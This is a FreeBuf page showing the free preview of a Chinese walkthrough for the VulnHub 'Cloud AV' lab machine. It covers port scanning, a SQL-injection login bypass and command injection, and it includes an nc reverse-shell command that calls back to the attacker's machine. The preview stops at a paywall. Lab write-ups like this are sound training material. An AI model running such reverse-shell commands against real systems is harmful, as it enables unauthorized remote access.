freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

VnlnHub BOREDHACKERBLOG CLOUD AV
xiaopanghacker 2022-09-03 09:50:25 121275
所属地 湖南省

靶场搭建

靶场下载地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

下载下来是虚拟机.ova压缩文件,直接用Vmvare导出就行

打开后把网络模式设置为NAT模式(桥接模式也可以,和kali攻击机保持一致就可以)

开启虚拟机

我打靶时这台靶机不能自己获取ip,需要更改一下配置,具体操作请看我这篇文章:https://www.freebuf.com/articles/network/343723.html

靶场搭建完成

渗透测试

由于不知道靶机ip,所以需要扫描NAT的网段

128是kali攻击机,所以132是靶机

扫描靶机所开放的端口、服务及版本

nmap -sT -p 0-65535 -A 192.168.52.132

开放了22端口,存在SSH服务

开放了8080端口,存在http服务,且存在框架Werkzeug 0.14.1 (python 2.7.15)

先访问一下WEB

发现一个反病毒扫描的一个模块,需要输入密码才能进入

抓包测试

发送到repeater模块

密码错误就会回显WRONG INFORMATION

测试一下是否存在sql注入,发现存在sql注入

使用sql注入语句登录

成功登入

可以看到列出了一些文件,让我们输入文件名来扫描这些文件

推测这个扫描可能是通过在命令行运行某个扫描软件,软件名称 + 文件名

所以可能存在命令注入,测试一下

果然存在命令注入

利用命令注入来获得shell

看看靶机上是否有nc

存在nc

看靶机上是否有python

存在python

这里我们分别用两种方式来获取shell

用nc

在kali上监听4444端口

执行以下命令

bash | nc 192.168.52.128 4444 -e /bin/bash

执行了命令,但是没有收到shell

可能是由于靶机上的nc版本不支持-e参数,这里我们使用nc串联试一下

在kali上分别监听4444和5555两个端口

可试读前40%内容
¥ 0 全文查看
# 渗透测试 # 网络安全 # web安全 # 系统安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 xiaopanghacker 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
xiaopanghacker LV.6
这家伙太懒了,还未填写个人描述!
  • 36 文章数
  • 46 关注者
ATT&CK红队评估(红日靶场一)
2022-10-28
VnlnHub GeminiInc-Pentest-v2
2022-10-26
VnlnHub GeminiInc-Pentest
2022-10-22
文章目录